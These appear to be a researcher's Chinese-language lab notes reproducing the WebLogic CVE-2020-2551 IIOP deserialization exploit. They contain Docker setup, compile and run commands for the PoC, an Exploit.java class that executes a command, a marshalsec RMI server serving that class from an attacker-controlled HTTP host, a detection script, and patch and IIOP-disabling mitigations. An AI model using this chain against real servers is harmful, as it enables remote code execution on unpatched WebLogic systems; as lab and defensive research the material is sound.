所需jar包:
https://drive.google.com/file/d/1ssc_8kkjLnzVMTO7G2aswIMLxSLD1Ali/view?usp=sharing
#编译
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/javac -cp /Users/caiqiqi/.m2/repository/org/springframework/spring-tx/4.3.16.RELEASE/spring-tx-4.3.16.RELEASE.jar:/Users/caiqiqi/Downloads/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:. com/cqq/WeblogicCVE_2020_2551.java
#执行
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/java -cp /Users/caiqiqi/Downloads/wlclient.jar:/Users/caiqiqi/.m2/repository/org/springframework/spring-tx/4.3.16.RELEASE/spring-tx-4.3.16.RELEASE.jar:/Users/caiqiqi/.m2/repository/org/springframework/spring-context/4.3.16.RELEASE/spring-context-4.3.16.RELEASE.jar:/Users/caiqiqi/Downloads/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:. com.cqq.WeblogicCVE_2020_2551 127.0.0.1
WebLogic环境搭建
weblogic环境搭建工具,开始用docker 18搭建不成功,
升级到docker到19.03.5之后,搭建成功。
失败原因可能说docker内置virtualbox的bug?
参考:
https://blogs.oracle.com/emeapartnerweblogic/weblogic-1212-installation-in-virtualbox-with-0-mhz-by-frank-munz
成功之后:
南哥牛逼!
参考:
https://github.com/QAX-A-Team/WeblogicEnvironment
下载weblogic,和jdk。然后
# 构建
docker build --build-arg JDK_PKG=jdk-7u21-linux-x64.tar.gz --build-arg WEBLOGIC_JAR=fmw_12.1.3.0.0_wls.jar -t weblogic12013jdk7u21 .
# 运行
docker run -d -p 7001:7001 -p 8453:8453 -p 5556:5556 --name weblogic12013jdk7u21 weblogic12013jdk7u21
启动之后,查看weblogic的调试端口:
是8453端口。
最后使用10.3.6.0 + JDK7u21,
然后使用这个项目的代码打成功了,效果如下:
1、编译:
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/javac -cp lib/com.bea.core.repackaged.apache.commons.logging_1.2.1.jar:lib/com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar:lib/permit-reflect-0.3.jar:lib/wlfullclient.jar com/payload/Main.java
2、执行:
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/java -cp lib/com.bea.core.repackaged.apache.commons.logging_1.2.1.jar:lib/com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar:lib/permit-reflect-0.3.jar:lib/wlfullclient.jar:. com.payload.Main 127.0.0.1 7001 "rmi://192.168.170.1:1099/Exploit"
javax.naming.NamingException: Unhandled exception in rebind() [Root exception is org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No]
at weblogic.corba.j2ee.naming.Utils.wrapNamingException(Utils.java:83)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:392)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:350)
at javax.naming.InitialContext.rebind(InitialContext.java:427)
at com.payload.Main.main(Main.java:46)
Caused by: org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No
at weblogic.corba.idl.RemoteDelegateImpl.postInvoke(RemoteDelegateImpl.java:477)
at weblogic.corba.idl.RemoteDelegateImpl.invoke(RemoteDelegateImpl.java:384)
at weblogic.corba.idl.RemoteDelegateImpl.invoke(RemoteDelegateImpl.java:341)
at org.omg.CORBA.portable.ObjectImpl._invoke(ObjectImpl.java:475)
at weblogic.corba.cos.naming._NamingContextAnyStub.rebind_any(_NamingContextAnyStub.java:52)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:378)
... 3 more
Caused by: org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No
at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:57)
at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
at java.lang.reflect.Constructor.newInstance(Constructor.java:526)
at java.lang.Class.newInstance(Class.java:379)
at weblogic.iiop.ReplyMessage.getThrowable(ReplyMessage.java:318)
at weblogic.corba.idl.RemoteDelegateImpl.postInvoke(RemoteDelegateImpl.java:468)
... 8 more
------------------------
----没有回显 自行检测----
------------------------
监听的HTTP服务
python3 -m http.server 80
下放Exploit.java编译后的Exploit.class文件:
public class Exploit{
public Exploit(){
try{
java.lang.Runtime.getRuntime().exec("ping weblogic.f9daa4b2c9be9ad66693.d.zhack.ca");
} catch(java.io.IOException e){
e.printStackTrace();
}
}
}
然后使用marshalsec创建一个RMI服务:
java -cp /Users/caiqiqi/GitProjects/marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.170.1/#Exploit" 1099
开始以为是weblogic版本的问题,后来发现JDK7u21 + 12.1.3.0版本也成功了。所以应该是之前的poc的问题了。
(需要使用小于等于Weblogic的JDK版本的JDK编译Exploit.java)
需要使用低版本的javac进行编译Exploit.java,成功之后的log是这样的:
若使用高版本的javac编译Exploit.java:
参考
https://github.com/Y4er/CVE-2020-2551
利用不成功的可以参考这篇文章:
漫谈WebLogic CVE-2020-2551
参考这个poc写出更通用的poc:
https://github.com/0nise/CVE-2020-2551/blob/master/CVE_2020_2551.java
检测工具:
https://github.com/shadowsock5/notes/blob/master/CVE-2020-2551.jar
python集成检测代码:
jar_2551 = "2551.jar"
command = "java -jar {0} {1} {2} http://{3}.{4}/cve_2020_2551".format(jar_2551, host, port, self.BANNER, self.DOMAIN)
VULN_YES = "vul ok"
VULN_NO = "vul error"
is_vuln = False
print(command)
#os.system(command)
r = os.popen(command)
info = r.readlines() # 那命令执行结果以一个数组的形式读进来
for i in info:
logger.info(i)
vuln_flag = info[2]
if vuln_flag:
if VULN_YES in vuln_flag:
is_vuln = True
elif VULN_NO in vuln_flag:
is_vuln = False
修复
参考以下链接安装补丁更新: https://www.oracle.com/security-alerts/cpujan2020.html
缓解措施:
可以通过临时关闭IIOP协议对该漏洞进行缓解。操作如下:
在Weblogic控制台中,选择“环境”->“服务器”->”AdminServer”->”协议”,取消“启用IIOP”的勾选。并重启Weblogic项目,使配置生效。
禁用IIOP生效前:
生效后:
参考:
- https://docs.oracle.com/middleware/11119/wls/WLACH/taskhelp/channels/EnableAndConfigureIIOP.html
杂
关于com.bea.core.repackaged
开始以为PoC里的JtaTransactionManager
是Spring自带的org.springframework.transaction.jta.JtaTransactionManager
,后来看大家的poc才知道这个类是weblogic自带的com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager
,不深入研究了。
排错
如果出现以下错误,可能是因为IIOP被禁用:
Exception in thread "main" javax.naming.NamingException: Couldn't connect to the specified host : [Root exception is org.omg.CORBA.COMM_FAILURE: vmcid: SUN minor code: 208 completed: Maybe]
at weblogic.corba.j2ee.naming.Utils.wrapNamingException(Utils.java:83)
at weblogic.corba.j2ee.naming.ORBHelper.getORBReferenceWithRetry(ORBHelper.java:656)
at weblogic.corba.j2ee.naming.ORBHelper.getORBReference(ORBHelper.java:594)
at weblogic.corba.j2ee.naming.InitialContextFactoryImpl.getInitialContext(InitialContextFactoryImpl.java:85)
at weblogic.corba.j2ee.naming.InitialContextFactoryImpl.getInitialContext(InitialContextFactoryImpl.java:31)
at weblogic.jndi.WLInitialContextFactory.getInitialContext(WLInitialContextFactory.java:46)
at javax.naming.spi.NamingManager.getInitialContext(NamingManager.java:684)
at javax.naming.InitialContext.getDefaultInitCtx(InitialContext.java:313)
at javax.naming.InitialContext.init(InitialContext.java:244)
at javax.naming.InitialContext.<init>(InitialContext.java:216)
at ysoserial.CVE_2020_2551.main(CVE_2020_2551.java:20)
Caused by: org.omg.CORBA.COMM_FAILURE: vmcid: SUN minor code: 208 completed: Maybe
at com.sun.corba.se.impl.logging.ORBUtilSystemException.connectionAbort(ORBUtilSystemException.java:2400)
at com.sun.corba.se.impl.logging.ORBUtilSystemException.connectionAbort(ORBUtilSystemException.java:2418)
at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.readBits(SocketOrChannelConnectionImpl.java:372)
at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.read(SocketOrChannelConnectionImpl.java:307)
at com.sun.corba.se.impl.transport.ReaderThreadImpl.doWork(ReaderThreadImpl.java:98)
at com.sun.corba.se.impl.orbutil.threadpool.ThreadPoolImpl$WorkerThread.performWork(ThreadPoolImpl.java:490)
at com.sun.corba.se.impl.orbutil.threadpool.ThreadPoolImpl$WorkerThread.run(ThreadPoolImpl.java:519)
Caused by: org.omg.CORBA.COMM_FAILURE: vmcid: SUN minor code: 211 completed: No
at com.sun.corba.se.impl.logging.ORBUtilSystemException.ioexceptionWhenReadingConnection(ORBUtilSystemException.java:2484)
at com.sun.corba.se.impl.logging.ORBUtilSystemException.ioexceptionWhenReadingConnection(ORBUtilSystemException.java:2502)
at com.sun.corba.se.impl.protocol.giopmsgheaders.MessageBase.readGIOPHeader(MessageBase.java:134)
at com.sun.corba.se.impl.protocol.giopmsgheaders.MessageBase.readGIOPMessage(MessageBase.java:116)
at com.sun.corba.se.impl.transport.CorbaContactInfoBase.createMessageMediator(CorbaContactInfoBase.java:171)
at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.readBits(SocketOrChannelConnectionImpl.java:333)
... 4 more
Caused by: java.io.IOException: End-of-stream
at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.readFully(SocketOrChannelConnectionImpl.java:684)
at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.read(SocketOrChannelConnectionImpl.java:545)
at com.sun.corba.se.impl.protocol.giopmsgheaders.MessageBase.readGIOPHeader(MessageBase.java:130)
... 7 more
poc依赖的jar包
- wlfullclient.jar
- com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3
- com.bea.core.repackaged.apache.commons.logging_1.2.1.jar
其中wlfullclient.jar
的生成方式:
在weblogic安装目录并没有找到这个,参考这个:
https://blog.csdn.net/konglongaa/article/details/78220249
E:\Oracle\Middleware10.3.6.0\wlserver_10.3\server\lib> java -jar wljarbuilder.jar
即可在lib目录生成wlfullclient.jar
。